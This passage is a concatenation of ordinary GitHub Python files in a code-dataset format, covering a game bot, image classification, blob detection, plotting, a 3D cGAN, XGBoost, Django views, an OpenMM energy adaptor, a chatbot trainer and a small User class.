1\n return count\n\n def NumProposals(self):\n \"\"\"Number of proposals currently on the table.\"\"\"\n return self.CountReplyType(['offer', 'reoffer'])\n\n def NumPropositions(self):\n \"\"\"Number of propositions currently on the table.\"\"\"\n return self.CountReplyType(['accept', 'reoffer'])\n\n def ReachedMaxProposals(self):\n \"\"\"Have we offered enough proposals?\"\"\"\n if self.NumProposals() >= self.context.config.maxproposals:\n logging.info('Quitting offering because we reached maxProposals')\n return True\n else:\n return False\n\n def AddReply(self, replytype, reply):\n \"\"\"Add a reply to the stack.\n\n Args:\n replytype: (string) type of reply to add\n reply: (string) the reply itself\n \"\"\"\n if replytype in self.REPLYTYPES:\n logging.debug('Adding reply type \"%s\": \"%s\"' % (replytype, reply))\n self.replies.append((replytype, reply))\n else:\n logging.error('Invalid reply type \"%s\": \"%s\"' % (replytype, reply))\n\n def LogGameState(self):\n \"\"\"Do some game state logging.\"\"\"\n logging.info('Round %d Starting Balance: $%0.4f'\n % (self.context.currentround, self.context.balance))\n logging.debug('Their Offered: %s' % str(self.context.their_offered))\n logging.debug('Our Offered: %s' % str(self.context.our_offered))\n logging.debug('Accepted: %s' % str(self.context.accepted))\n logging.debug('Provided: %s' % str(self.context.provided))\n\n def MetPercentOfferedSecrets(self, secretcount):\n \"\"\"Determine if we met the secret percentage rule.\"\"\"\n if not self.context.config.hassecrets:\n return True\n else:\n if not self.CountReplyType(['offer']):\n return False\n else:\n perc = float(secretcount) / float(self.CountReplyType(['offer']))\n return not perc < self.context.config.secretratio\n\n def OfferTask(self):\n logging.info('Running OfferTask')\n ouroffer = [x.problemnumbers[0] for x in self.context.our_offered]\n theiroffer = [x.problemnumbers[0] for x 
in self.context.their_offered]\n justoffered = []\n secretcount = 0\n for x in range(FLAGS.offercount):\n if not self.MetPercentOfferedSecrets(secretcount):\n kind = 'secret'\n secretcount += 1\n else:\n kind = 'all'\n o = offer.Offer.GenerateOffer(ouroffer, theiroffer, justoffered, kind)\n logging.debug('Offering %s for %0.8f' % (o.problemnumbers, o.price))\n justoffered.append(o.problemnumbers[0])\n self.AddReply('offer', o.GetOffer())\n\n if self.ReachedMaxProposals():\n break\n \n def AcceptTask(self):\n logging.info('Running AcceptTask')\n for offer in self.context.their_offered:\n # Meet their needs\n if self.NumPropositions() >= self.context.config.minpropositions:\n logging.info('Met minimum propositions requirement. (%d/%d)'\n % (self.NumPropositions(),\n self.context.config.minpropositions))\n break\n\n if offer.IsGoodBuy():\n logging.info('%s is good buy' % str(offer))\n self.AddReply('accept', offer.GetAccept())\n self.context.endbalance -= offer.price\n else:\n logging.info('%s is bad buy' % str(offer))\n\n def ReofferTask(self):\n logging.info('Running ReofferTask')\n if not self.CountReplyType(['accept']):\n for offer in self.context.their_offered:\n logging.info('Reoffering their id %d' % offer.offerid)\n self.AddReply('reoffer', offer.GetReoffer())\n break\n\n def ProvideTask(self):\n logging.info('Running ProvideTask')\n otheroffers = list(self.context.accepted)\n for accepted in self.context.accepted:\n if self.context.playerid != accepted.provider:\n continue\n logging.info('Providing number %s for offer %d'\n % (accepted.problemnumbers, accepted.offerid))\n p = problem.Problem.GenerateFromAccepted(accepted)\n self.AddReply('provide', p.GetProvide())\n\n def SolveTask(self):\n logging.info('Running SolveTask')\n solvestart = time.time()\n for problem in self.context.provided:\n self.AddReply('solve', problem.Solve())\n self.context.endbalance += problem.profit\n if self.CountReplyType(['solve']):\n logging.info('Solves took %s seconds' % (time.time() - solvestart))\n\n def GenerateReply(self):\n \"\"\"Generate a string reply packet for the administrator.\"\"\"\n logging.info('Generating Game Reply')\n r = 'playertrans[\\n %d\\n' % self.id\n for replytype, reply in self.replies:\n r += ' %s \\n' % reply\n r +=']\\n'\n logging.info('Reply Size: %s' % len(r))\n logging.debug('Reply: %s' % r)\n return r\n\n def RunTasks(self):\n \"\"\"Actually run the game.\"\"\"\n starttime = time.time()\n self.LogGameState()\n logging.info('Running all tasks...')\n map(lambda x: x(), [self.OfferTask, self.AcceptTask, self.ReofferTask,\n self.ProvideTask, self.SolveTask])\n logging.info('Ending Balance: $%0.4f' % self.context.endbalance)\n endtime = time.time()\n logging.info('Gameplay took %s' % (endtime - starttime))\n\n @classmethod\n def Play(cls, gamedata):\n logging.debug('Got: %s' % gamedata)\n for runnumber in range(5):\n try:\n g = cls(gamedata)\n g.RunTasks()\n r = g.GenerateReply()\n return r\n except:\n logging.exception('Encountered MAJOR error during gameplay')\n\n return 'Well, shit.'\n","repo_name":"Sophie-Williams/Athena-SCG-Bot","sub_path":"src/game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":6645,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"4"} +{"seq_id":"14668721550","text":"\n# coding: utf-8\n# Predict the Image classes Using the weightes stored in the folder\n\n# Import the Required Libraries\nimport os\nimport numpy as np\nfrom keras.preprocessing.image import ImageDataGenerator, load_img, 
img_to_array\nfrom keras.models import Sequential, load_model\nimport numpy as np\nfrom keras.preprocessing import image\n\n\n# Basic Settings\nimg_width, img_height = 150, 150\nmodel_path = 'model.h5'\nmodel_weights_path = 'modelConv2d.h5'\nmodel = load_model(model_path)\nmodel.load_weights(model_weights_path)\n\n\n# Rescale the Image and store it in a folder\ntest_datagen = ImageDataGenerator(rescale=1./255)\n\n\ntest_set = test_datagen.flow_from_directory(\n './test-data/test_61326',\n target_size=(150, 150),\n batch_size=16,\n class_mode=None,\nshuffle=False)\n\n\n# List all the files in the directory\nlist_file=os.listdir(\"./test-data/test_61326/\")\n\n\n\n##Predicting using test data\nfor i in list_file:\n stri = str(i)\n test_image = image.load_img('./test-data/test_61326/' + stri, target_size = (150,150))\n test_image = image.img_to_array(test_image)\n test_image = np.expand_dims(test_image,axis = 0)\n result = model.predict_classes(test_image,verbose=1) # Predicts the class labels\n \n # Convert the predicted class into label and preidct it\n if result==0:\n print('61326_ok_back')\n elif result==1:\n print('61326_ok_front')\n elif result==2:\n print('61326_scratch_mark')\n elif result==3:\n print('61326_slot_damage')\n elif result==4:\n print('61326_thinning')\n elif result==5:\n print('61326_wrinkle')\n else:\n print('none')\n\n","repo_name":"abhiyerasi/JBM-Damage-Detection-AI","sub_path":"predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":1622,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"4"} +{"seq_id":"19084372778","text":"from skimage import data\nfrom skimage import io\nfrom skimage.feature import blob_dog, blob_log, blob_doh\nfrom math import sqrt\nimport numpy as np\nimport itertools\nfrom skimage.color import rgb2gray\n\nimport matplotlib.pyplot as plt\n\nimage = io.imread(\"dipper1.jpg\")\nheight = len(image[0])\nwidth = len(image)\n# image = data.hubble_deep_field()[0:500, 0:500]\nimage_gray = rgb2gray(image)\n\nblobs_log = blob_log(image_gray, max_sigma=30, num_sigma=10, threshold=.1)\n\n# Compute radii in the 3rd column.\nblobs_log[:, 2] = blobs_log[:, 2] * sqrt(2)\n# filter blogs greater then 1 radius\nblobs_log = blobs_log[blobs_log[:,2]>1,:]\n\nblobs_dog = blob_dog(image_gray, max_sigma=30, threshold=.1)\nblobs_dog[:, 2] = blobs_dog[:, 2] * sqrt(2)\n# filter blogs greater then 2 radius\nblobs_dog = blobs_dog[blobs_dog[:,2]>2,:]\n\nblobs_doh = blob_doh(image_gray, max_sigma=30, threshold=.01)\n# filter blogs greater then 4 radius\nblobs_doh = blobs_doh[blobs_doh[:,2]>4,:]\n\nblobs_list = [blobs_log, blobs_dog, blobs_doh]\ncolors = ['yellow', 'lime', 'red']\ntitles = ['Laplacian of Gaussian', 'Difference of Gaussian',\n 'Determinant of Hessian']\nsequence = zip(blobs_list, colors, titles)\n\nfig, axes = plt.subplots(1, 3, figsize=(14, 4), sharex=True, sharey=True,\n subplot_kw={'adjustable': 'box-forced'})\nplt.tight_layout()\n\naxes = axes.ravel()\nfor blobs, color, title in sequence:\n ax = axes[0]\n axes = axes[1:]\n ax.set_title(title)\n ax.imshow(image, interpolation='nearest')\n ax.set_axis_off()\n for blob in blobs:\n y, x, r = blob\n c = plt.Circle((x, y), r, color=color, linewidth=2, fill=False)\n ax.add_patch(c)\n points = blobs[:,:-1]\n # for x in np.nditer(points, op_flags=['readwrite']):\n # x = [height - x[0], x[1]]\n\n print(points)\n ax.plot(*zip(*itertools.chain.from_iterable(itertools.combinations(points, 2))),color='brown', marker='o')\n\n# a = np.sort(blobs_log, key=lambda row: 
row[1])\n# arr = blobs_log[blobs_log[:,2].argsort()]\n# print(blobs_log[blobs_log[:,2]>1,:])\n# print(blobs_dog[blobs_dog[:,2]>1,:])\n# print(blobs_doh[blobs_doh[:,2]>1,:])\nplt.show()\n\n# https://snipt.net/Miki/sort-array-by-nth-column-in-numpypython/\n# http://stackoverflow.com/questions/6834483/how-do-you-create-line-segments-between-two-points","repo_name":"JoshuaOdell/constellation-recognition","sub_path":"experiments/testingone.py","file_name":"testingone.py","file_ext":"py","file_size_in_byte":2297,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"4"} +{"seq_id":"4065537725","text":"# # 2.10-3 Stacked Histograms\nimport plotly as py\nimport plotly.graph_objs as go\nimport numpy as np\npyplt = py.offline.plot\n\ns1 = np.random.RandomState(1)\nx0 = s1.randn(1000)\nx1 = s1.randn(1000)\n\ntrace0 = go.Histogram(\n x=x0\n)\ntrace1 = go.Histogram(\n x=x1\n)\ndata = [trace0, trace1]\nlayout = go.Layout(barmode='stack')\nfig = go.Figure(data=data, layout=layout)\n\npyplt(fig, filename='tmp/stacked_histogram.html')\n","repo_name":"sunshe35/PythonPlotlyCodes","sub_path":"Chapter02/2.10_HistogramsChart_3.py","file_name":"2.10_HistogramsChart_3.py","file_ext":"py","file_size_in_byte":417,"program_lang":"python","lang":"en","doc_type":"code","stars":230,"dataset":"github-code","pt":"4"} +{"seq_id":"7067526681","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Mar 29 02:18:54 2022\n\n@author: Xiao\npix2pix model\n\"\"\"\nimport sys\n# if local\n#sys.path.insert(1,'/home/xiao/Inverse_MS_Design/Python/Common_lib/')\n# if HPC\nsys.path.insert(1,'/home/xshang93/projects/def-yuzou/xshang93/Inverse_MS_Design/Python/Common_lib/')\nimport tensorflow as tf\n\nimport os\nimport time\nimport datetime\nimport numpy as np\n\nfrom image_vis_3D import plot_3D_res\nfrom joblib import load\nfrom data_preprocessing import train_dataset_gen_cGAN, DeNormalizeData\n\n \nwork_dir = './'\ndata_dirs = [\n \"/home/xshang93/projects/def-yuzou/xshang93/ML/dataset/10_cGAN/preprocessed/\",\n \"/home/xshang93/projects/def-yuzou/xshang93/ML/dataset/15_cGAN/preprocessed/\",\n \"/home/xshang93/projects/def-yuzou/xshang93/ML/dataset/20_cGAN/preprocessed/\",\n \"/home/xshang93/projects/def-yuzou/xshang93/ML/dataset/25_cGAN/preprocessed/\",\n \"/home/xshang93/projects/def-yuzou/xshang93/ML/dataset/30_cGAN/preprocessed/\",\n \"/home/xshang93/projects/def-yuzou/xshang93/ML/dataset/35_cGAN/preprocessed/\",\n \"/home/xshang93/projects/def-yuzou/xshang93/ML/dataset/40_cGAN/preprocessed/\",\n \"/home/xshang93/projects/def-yuzou/xshang93/ML/dataset/45_cGAN/preprocessed/\",\n \"/home/xshang93/projects/def-yuzou/xshang93/ML/dataset/50_cGAN/preprocessed/\",\n ]\nOUTPUT_CHANNELS = 1 # stress\nsave_name = 'no_norm_20220819'\ntrain_ratio = 0.8\npre_trained_model = load(work_dir+'HP_resultSGD_alldata_200eps.pkl').best_estimator_.model_\n\n\n# Functions to build the generator\n\ndef downsample(filters, transfer_layer='', transfer=True, apply_batchnorm=True):\n initializer = tf.random_normal_initializer(0., 0.02)\n\n result = tf.keras.Sequential()\n\n result.add(\n tf.keras.layers.Conv3D(filters, kernel_size=(3, 3, 3), strides=1, padding='valid',\n kernel_initializer=initializer, use_bias=False))\n # if transfer learning is activated\n if transfer:\n result.trainable = False\n # copy the matching pre-trained conv kernel into the layer just added\n result.layers[-1].set_weights(pre_trained_model.layers[transfer_layer].get_weights())\n if apply_batchnorm:\n result.add(tf.keras.layers.BatchNormalization())\n if transfer:\n result.trainable = False\n
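# copy the matching pre-trained BatchNorm parameters into the layer just added\n 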
result.layers[-1].set_weights(pre_trained_model.layers[transfer_layer + 1].get_weights())\n\n result.add(tf.keras.layers.LeakyReLU())\n\n return result\n\ndef upsample(filters, apply_dropout=False):\n initializer = tf.random_normal_initializer(0., 0.02)\n\n result = tf.keras.Sequential()\n result.add(\n tf.keras.layers.Conv3DTranspose(filters, kernel_size=(3, 3, 3), strides=1,\n padding='valid',\n kernel_initializer=initializer,\n use_bias=False))\n\n result.add(tf.keras.layers.BatchNormalization())\n\n if apply_dropout:\n result.add(tf.keras.layers.Dropout(0.5))\n\n result.add(tf.keras.layers.ReLU())\n\n return result\n\ndef Generator():\n inputs = tf.keras.layers.Input(shape=[32, 32, 32, 4]) # instantiate a Keras tensor\n\n down_stack = [\n downsample(32, transfer_layer = 1, transfer = True), # (batch_size, 30, 30, 30, 32)\n downsample(32, transfer_layer = 3, transfer = True), # (batch_size, 28, 28, 28, 32)\n downsample(64, transfer_layer = 5, transfer = True), # (batch_size, 26, 26, 26, 64)\n downsample(128, transfer_layer = 7, transfer = True), # (batch_size, 24, 24, 24, 128)\n ] # put everything in a list and then glue them together\n\n up_stack = [\n# upsample(512, 4, apply_dropout=True), # (batch_size, 2, 2, 1024)\n# upsample(512, 4, apply_dropout=True), # (batch_size, 4, 4, 1024)\n# upsample(512, 4, apply_dropout=True), # (batch_size, 8, 8, 1024)\n upsample(128), # (batch_size, 26, 26, 26, 128)\n upsample(64), # (batch_size, 28, 28, 28, 64)\n upsample(32), # (batch_size, 30, 30, 30, 32)\n upsample(32), # (batch_size, 32, 32, 32, 32)\n ]\n\n initializer = tf.random_normal_initializer(0., 0.02)\n last = tf.keras.layers.Conv3DTranspose(OUTPUT_CHANNELS, kernel_size=(3, 3, 3),\n strides=1,\n padding='valid',\n kernel_initializer=initializer,\n activation='tanh') # (batch_size, 32, 32, 32, 1)\n\n x = inputs\n\n # Downsampling through the model\n skips = []\n for down in down_stack:\n x = down(x)\n skips.append(x)\n\n skips = reversed(skips[:-1])\n\n # Upsampling and establishing the skip connections\n for up, skip in zip(up_stack, skips):\n x = up(x)\n x = tf.keras.layers.Concatenate()([x, skip])\n\n x = last(x)\n\n return tf.keras.Model(inputs=inputs, outputs=x)\n\n# Define the generator loss\n\nLAMBDA = 100\n\nloss_object = tf.keras.losses.BinaryCrossentropy(from_logits=True)\n\ndef generator_loss(disc_generated_output, gen_output, target):\n gan_loss = loss_object(tf.ones_like(disc_generated_output), disc_generated_output)\n\n # Mean absolute error\n l1_loss = tf.reduce_mean(tf.abs(target - gen_output))\n\n total_gen_loss = gan_loss + (LAMBDA * l1_loss)\n\n return total_gen_loss, gan_loss, l1_loss\n\n# Functions to build the discriminator\ndef Discriminator():\n initializer = tf.random_normal_initializer(0., 0.02)\n\n inp = tf.keras.layers.Input(shape=[32, 32, 32, 4], name='input_image')\n tar = tf.keras.layers.Input(shape=[32, 32, 32, 1], name='target_image')\n\n x = tf.keras.layers.concatenate([inp, tar]) # (batch_size, 32, 32, 32, 5)\n\n down1 = downsample(32, transfer = False, apply_batchnorm = False)(x) # (batch_size, 30, 30, 30, 32)\n down2 = downsample(32, transfer = False)(down1) # (batch_size, 28, 28, 28, 32)\n down3 = downsample(64, transfer = False)(down2) # (batch_size, 26, 26, 26, 64)\n\n zero_pad1 = tf.keras.layers.ZeroPadding3D()(down3) # (batch_size, 28, 28, 28, 64)\n conv = tf.keras.layers.Conv3D(128, kernel_size = (3, 3, 3), strides=1,\n kernel_initializer=initializer,\n use_bias=False)(zero_pad1) # (batch_size, 26, 26, 26, 128)\n\n batchnorm1 = 
tf.keras.layers.BatchNormalization()(conv)\n\n leaky_relu = tf.keras.layers.LeakyReLU()(batchnorm1)\n\n zero_pad2 = tf.keras.layers.ZeroPadding3D()(leaky_relu) # (batch_size, 33, 33, 512)\n\n last = tf.keras.layers.Conv3D(1, kernel_size = (3, 3, 3), strides=1,\n kernel_initializer=initializer)(zero_pad2) # (batch_size, 30, 30, 1)\n\n return tf.keras.Model(inputs=[inp, tar], outputs=last)\n\n# Define the discriminator loss\ndef discriminator_loss(disc_real_output, disc_generated_output):\n real_loss = loss_object(tf.ones_like(disc_real_output), disc_real_output)\n\n generated_loss = loss_object(tf.zeros_like(disc_generated_output), disc_generated_output)\n\n total_disc_loss = real_loss + generated_loss\n\n return total_disc_loss\n\n# Generate images for checking\ndef generate_images(model, test_input, tar):\n prediction = model(test_input, training=True)\n prediction = DeNormalizeData(prediction,data_min,data_max)\n plot_3D_res(prediction,0,save_dir = './pred')\n plot_3D_res(tar,0,save_dir = './true')\n# \n# \n# Functions for training\n\nlog_dir=\"logs/\"\n\nsummary_writer = tf.summary.create_file_writer(\n log_dir + \"fit/\" + datetime.datetime.now().strftime(\"%Y%m%d-%H%M%S\"))\n\n@tf.function\ndef train_step(input_image, target, step):\n with tf.GradientTape() as gen_tape, tf.GradientTape() as disc_tape:\n gen_output = generator(input_image, training=True)\n\n disc_real_output = discriminator([input_image, target], training=True)\n disc_generated_output = discriminator([input_image, gen_output], training=True)\n\n gen_total_loss, gen_gan_loss, gen_l1_loss = generator_loss(disc_generated_output, gen_output, target)\n disc_loss = discriminator_loss(disc_real_output, disc_generated_output)\n\n generator_gradients = gen_tape.gradient(gen_total_loss,\n generator.trainable_variables)\n discriminator_gradients = disc_tape.gradient(disc_loss,\n discriminator.trainable_variables)\n\n generator_optimizer.apply_gradients(zip(generator_gradients,\n generator.trainable_variables))\n discriminator_optimizer.apply_gradients(zip(discriminator_gradients,\n discriminator.trainable_variables))\n\n with summary_writer.as_default():\n tf.summary.scalar('gen_total_loss', gen_total_loss, step=step//1000)\n tf.summary.scalar('gen_gan_loss', gen_gan_loss, step=step//1000)\n tf.summary.scalar('gen_l1_loss', gen_l1_loss, step=step//1000)\n tf.summary.scalar('disc_loss', disc_loss, step=step//1000)\n\ndef fit(train_ds, steps):\n# example_input, example_target = next(iter(test_ds.take(1)))\n start = time.time()\n\n for step, (input_image, target) in train_ds.repeat().take(steps).enumerate():\n if (step) % 1000 == 0:\n\n if step != 0:\n print(f'Time taken for 1000 steps: {time.time()-start:.2f} sec\\n')\n\n start = time.time()\n\n# generate_images(generator, example_input, example_target)\n print(f\"Step: {step//1000}k\")\n\n train_step(input_image, target, step)\n\n # Training step\n if (step+1) % 50 == 0:\n print('.', end='', flush=True)\n \n # Save (checkpoint) the model every 20000 steps (u.e. 
about 4 epochs)\n if (step + 1) % 20000 == 0:\n checkpoint.save(file_prefix=checkpoint_prefix)\n \n# ---------------------------- Body -------------------------------------- #\nif __name__ == \"__main__\":\n # The batch size of 1 produced better results for the U-Net in the original pix2pix experiment\n BUFFER_SIZE = 100000;BATCH_SIZE = 1\n \n # Build input pipelines\n train_input,train_target,test_input,test_target,data_min,data_max = train_dataset_gen_cGAN(save_name,data_dirs,train_ratio,1,5)\n np.save('min_max_'+save_name,[data_min,data_max])\n \n train_dataset = tf.data.Dataset.from_tensor_slices((train_input,train_target))\n train_dataset = train_dataset.shuffle(BUFFER_SIZE)#buffer size should >= dataset size\n train_dataset = train_dataset.batch(BATCH_SIZE)\n \n test_dataset = tf.data.Dataset.from_tensor_slices((test_input,test_target))\n test_dataset = test_dataset.batch(BATCH_SIZE)\n \n # Build the generator\n generator = Generator()\n# tf.keras.utils.plot_model(generator, show_shapes=True, dpi=64)\n #\n ## Test the generator\n #gen_output = generator(tf.reshape(test_input[0],shape=[-1,32,32,32,4]), training=False)#training is false set it into inference mode, where dropout is disabled\n #plot_3D_res(gen_output,0)\n ##\n # Build the discriminator\n discriminator = Discriminator()\n \n ## Test the discriminator\n #disc_out = discriminator([tf.reshape(test_input[0],shape=[-1,32,32,32,4]), gen_output], training=False)#tf.newaxis used to add an aixs to match gen_output\n ##\n # Define the optimizers and checkpoint savers\n generator_optimizer = tf.keras.optimizers.Adam(2e-4, beta_1=0.5)\n discriminator_optimizer = tf.keras.optimizers.Adam(2e-4, beta_1=0.5)\n \n checkpoint_dir = './training_checkpoints'\n checkpoint_prefix = os.path.join(checkpoint_dir, \"ckpt\")\n checkpoint = tf.train.Checkpoint(generator_optimizer=generator_optimizer,\n discriminator_optimizer=discriminator_optimizer,\n generator=generator,\n discriminator=discriminator)\n \n # Train the model\n fit(train_dataset, steps=100000)\n \n # save the model\n generator.save(save_name+'_Generator.h5')\n #tf.data.experimental.save(test_dataset, './')\n","repo_name":"xshang93/MsInverseDesign","sub_path":"cGAN_3D.py","file_name":"cGAN_3D.py","file_ext":"py","file_size_in_byte":11663,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"4"} +{"seq_id":"9311078234","text":"# XGBoost baseline for feature engineering.\n# baseline\n# Training result: [192] train-mae:0.051412 holdout-mae:0.051941\n# Public score: 0.0646266\n# baseline norm: y -= y_mean; y /= y_std before train, y_pred *= y_std; y_pred += y_mean\n# Train result: [89] train-mae:0.623345 holdout-mae:0.621901\n# Public score: 0.0645886\n\nimport common_utils as cu\nimport xgboost as xgb\nimport numpy as np\n\n\nclass XGBoostModel(object):\n def __init__(self):\n self.base_model = None\n\n def train(self, X_train, y_train, X_holdout, y_holdout):\n print('Training the model.')\n params = {\n 'eta': 0.033,\n 'max_depth': 6,\n 'subsample': 0.80,\n 'objective': 'reg:linear',\n 'eval_metric': 'mae',\n 'silent': 1\n }\n xgboost_X_train = xgb.DMatrix(X_train, label=y_train)\n xgboost_X_holdout = xgb.DMatrix(X_holdout, label=y_holdout)\n watchlist = [(xgboost_X_train, 'train'), (xgboost_X_holdout, 'holdout')]\n self.base_model = xgb.train(\n params, xgboost_X_train, 10000, watchlist,\n early_stopping_rounds=100, verbose_eval=10)\n\n def predict(self, predict_df):\n return self.base_model.predict(xgb.DMatrix(predict_df))\n\n\ndef run():\n # 
read train data.\n X, y = cu.get_train_data(encode_non_object=False)\n y_mean, y_std = y.mean(), y.std()\n y -= y_mean; y /= y_std\n\n # get CV from train data.\n X_train, y_train, X_holdout, y_holdout = cu.get_cv(X, y)\n\n # train model.\n xgbm = XGBoostModel()\n xgbm.train(X_train, y_train, X_holdout, y_holdout)\n\n # read test data.\n T = cu.get_test_data(encode_non_object=False)\n\n # predict result.\n print('Predicting.')\n y_pred = xgbm.predict(T[X_train.columns])\n y_pred *= y_std; y_pred += y_mean\n\n # write result.\n cu.write_result(y_pred)\n\n\nif __name__ == \"__main__\":\n run()\n","repo_name":"YangWenfeng/ZillowPrize-bak","sub_path":"experiment_wenfeng/xgboost_baseline_norm.py","file_name":"xgboost_baseline_norm.py","file_ext":"py","file_size_in_byte":1886,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"4"} +{"seq_id":"24844475074","text":"\nimport datetime;\n\n'''\nClass Features:\n- Methods\n- Initialization\n- Help text\n'''\nclass User:\n \"\"\"A member of FriendFace. For now we are\n only storing their name and birthday.\n But soon we will store an uncomfortable\n amount of user information.\"\"\"\n \n def __init__(self, full_name, birthday): # Called every an object is created of this class\n \"\"\"Doc comment for function __init__()\"\"\"\n self.name = full_name;\n self.birthday = birthday; # yyyymmdd\n \n \n # Extract first and last names\n name_pieces = full_name.split(\" \")\n self.first_name = name_pieces[0]\n self.last_name = name_pieces[-1]\n\n #pass # A way to type a line that does nothing\n \n def age(self):\n \"\"\"Return the age of the user in years\"\"\"\n today = datetime.date(2001, 5, 12);\n yyyy = int(self.birthday[0:4])\n mm = int(self.birthday[4:6])\n dd = int(self.birthday[6:8])\n dob = datetime.date(yyyy, mm, dd) #Date of birth\n age_in_days = (today - dob).days;\n age_in_years = age_in_days / 365\n return int(age_in_years)\n#\n\nif __name__ == \"__main__\":\n user = User(\"Dave Bowman\", \"19710315\")\n print(user.name)\n print(user.birthday)\n print(user.first_name)\n print(user.last_name)\n print(user.age())\n#","repo_name":"MattMarti/Practice","sub_path":"Python/Socratica/Classes-and-Objects/User.py","file_name":"User.py","file_ext":"py","file_size_in_byte":1312,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"4"} +{"seq_id":"71291504118","text":"from django.shortcuts import render, redirect\nfrom django.http import HttpResponse\nfrom item.models import Category, Item\nfrom .forms import SignupForm\n# Create your views here.\ndef index(request):\n items = Item.objects.filter(is_sold=False)[:6]\n categories = Category.objects.all()\n context = {\n 'categories': categories,\n 'items': items,\n }\n return render(request,'main/index.html', context)\ndef contact(request):\n categories = Category.objects.all()\n context = {\n 'categories': categories,\n }\n return render(request,'main/contact.html',context)\n\ndef signup(request):\n categories = Category.objects.all()\n if request.method == 'POST':\n form = SignupForm(request.POST)\n\n if form.is_valid():\n form.save()\n\n return redirect('/login/')\n \n else:\n form = SignupForm()\n\n context = {\n 'form': form,\n 'categories': categories,\n }\n return render(request, 
'auth/signup.html',context)\n","repo_name":"dedyspooky/Multivendor-ecommerce","sub_path":"main/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1005,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"4"} +{"seq_id":"21144767363","text":"from simtk import openmm as mm\nfrom simtk.openmm import app\nfrom simtk.unit import kelvin, kilojoule, mole, nanometer\nimport torch\n\n\n# Gas constant in kJ / mol / K\nR = 8.314e-3\n\n\nclass OpenMMEnergyAdaptor(torch.autograd.Function):\n @staticmethod\n def forward(ctx, input, openmm_context, temperature):\n device = input.device\n n_batch = input.shape[0]\n n_dim = input.shape[1]\n energies = torch.zeros((n_batch, 1))\n forces = torch.zeros((n_batch, n_dim))\n\n kBT = R * temperature\n input = input.cpu().detach().numpy()\n for i in range(n_batch):\n # reshape the coordinates and send to OpenMM\n x = input[i, :].reshape(-1, 3)\n openmm_context.setPositions(x)\n state = openmm_context.getState(getForces=True, getEnergy=True)\n\n # get energy\n energies[i] = (\n state.getPotentialEnergy().value_in_unit(kilojoule / mole) / kBT\n )\n\n # get forces\n f = (\n state.getForces(asNumpy=True).value_in_unit(\n kilojoule / mole / nanometer\n )\n / kBT\n )\n forces[i, :] = torch.from_numpy(-f.reshape(-1).astype(\"float32\"))\n # Save the forces for the backward step, uploading to the gpu if needed\n ctx.save_for_backward(forces.to(device=device))\n return energies.to(device=device)\n\n @staticmethod\n def backward(ctx, grad_output):\n forces, = ctx.saved_tensors\n return forces * grad_output, None, None\n\n\nopenmm_energy = OpenMMEnergyAdaptor.apply\n\n\ndef regularize_energy(energy, energy_cut, energy_max):\n # Fill any NaNs with energy_max\n energy = torch.where(torch.isfinite(energy), energy, energy_max)\n # Cap the energy at energy_max\n energy = torch.where(energy < energy_max, energy, energy_max)\n # Make it logarithmic above energy cut and linear below\n energy = torch.where(\n energy < energy_cut, energy, torch.log(energy - energy_cut + 1) + energy_cut\n )\n return energy\n","repo_name":"maccallumlab/BoltzmannGenerator","sub_path":"boltzmann/protein/openmm_adaptor.py","file_name":"openmm_adaptor.py","file_ext":"py","file_size_in_byte":2075,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"4"} +{"seq_id":"17649505176","text":"#!/usr/bin/env python\n# coding: utf-8\n\nimport nltk\nfrom nltk.stem.lancaster import LancasterStemmer\nstemmer = LancasterStemmer()\n\nimport numpy as np\nimport tflearn\nimport tensorflow as tf\nimport random\nimport json\n\n\nwith open('../intents/intents.json') as json_data:\n intents = json.load(json_data)\n\nnltk.download('punkt')\n\nwords = []\nclasses = []\ndocuments = []\nignore_words = ['?']\n# loop through each sentence in our intents patterns\nfor intent in intents['intents']:\n for pattern in intent['patterns']:\n # tokenize each word in the sentence\n w = nltk.word_tokenize(pattern)\n # add to our words list\n words.extend(w)\n # add to documents in our corpus\n documents.append((w, intent['tag']))\n # add to our classes list\n if intent['tag'] not in classes:\n classes.append(intent['tag'])\n\n# stem and lower each word and remove duplicates\nwords = [stemmer.stem(w.lower()) for w in words if w not in ignore_words]\nwords = sorted(list(set(words)))\n\n\ntraining = []\noutput = []\n\noutput_empty = [0] * len(classes)\n\nfor doc in documents:\n bag = []\n\n pattern_words = doc[0]\n pattern_words = 
[stemmer.stem(word.lower()) for word in pattern_words]\n\n for w in words:\n bag.append(1) if w in pattern_words else bag.append(0)\n\n # output is a '0' for each tag and '1' for current tag\n output_row = list(output_empty)\n output_row[classes.index(doc[1])] = 1\n\n training.append([bag, output_row])\n\nrandom.shuffle(training)\ntraining = np.array(training)\n\ntrain_x = list(training[:,0])\ntrain_y = list(training[:,1])\n\n\ntf.reset_default_graph()\n\nnet = tflearn.input_data(shape=[None, len(train_x[0])])\nnet = tflearn.fully_connected(net, 8)\nnet = tflearn.fully_connected(net, 8)\nnet = tflearn.fully_connected(net, len(train_y[0]), activation='softmax')\nnet = tflearn.regression(net)\n\nmodel = tflearn.DNN(net, tensorboard_dir='tflearn_logs')\n\nmodel.fit(train_x, train_y, n_epoch=1000, batch_size=8, show_metric=True)\nmodel.save('model.tflearn')\n\n\nimport pickle\npickle.dump( {'words':words, 'classes':classes, 'train_x':train_x, 'train_y':train_y}, open( \"training_data\", \"wb\" ) )\n\n","repo_name":"ReynaDoer/Medical-Chatbot","sub_path":"scripts/training.py","file_name":"training.py","file_ext":"py","file_size_in_byte":2156,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"4"} +{"seq_id":"39406451067","text":"# Napisz parę programów - klienta i serwer, w których porównasz czas przesyłu pakietów za pomocą gniazdaTCP i gniazda UDP. Następnie, po przeprowadzonym teście, odpowiedz na pytania:\n\nimport socket\n\n# TCP server\n\ns = 